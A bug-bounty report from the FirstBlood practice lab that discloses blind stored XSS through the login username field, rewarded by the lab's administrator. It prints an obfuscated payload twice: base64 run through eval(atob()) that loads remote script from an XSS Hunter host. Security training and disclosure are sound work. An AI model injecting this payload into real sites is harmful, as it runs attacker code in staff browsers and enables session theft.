FirstBlood-#1320 — Blind XSS in username field
This issue was discovered on FirstBlood v3
On 2022-12-09, ayush1098 
Level 8
reported:
Getting started
Learn about vulnerability types 
Getting started in bug bounties 
Test your knowledge
Free Web Application Challenges
BugBountyHunter Membership
Guides for your hunts 
ZSeano's Methodology
Effective Note Taking for bug bounties
Useful Resources 
Disclosed HackerOne Reports 
Our community
Endorsed Members
Hackevents 
Member Articles
Hello Team,
Summary:
There is a hint mentioned on the login.php page that the Attempts to log in will be logged.. After seeing this, I tried blind XSS payloads and got the pingback after a few hours from https://firstblood-helper.com/login_attempts.php?id=<id>.
Steps To Reproduce:
-
Visit the login.php endpoint.
-
Put your bxss payload in the username and password.
This was my payload
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
I am attaching my DOM report from XSS hunter: https://drive.google.com/file/d/1XKfqJ8G5abb58EEdAKV--8bXpiSxWLCo/view?usp=sharing
You will get the pingback after a few hours.
Thanks & Regards
Ayush Singh
P1 CRITICAL
Endpoint: /login.php
Parameter: username
Payload: "><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYTZ6eHNzaHQueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
FirstBlood ID: 72
Vulnerability Type: Stored XSS
Login attempts were logged on an internal panel on firstblood-helper.com and the username is vulnerable to blind XSS affecting FirstBlood staff
Report Feedback
Creator & Administrator
Congratulations, you were third to report this. You have won a LIMITED edition BugBountyHunter hat!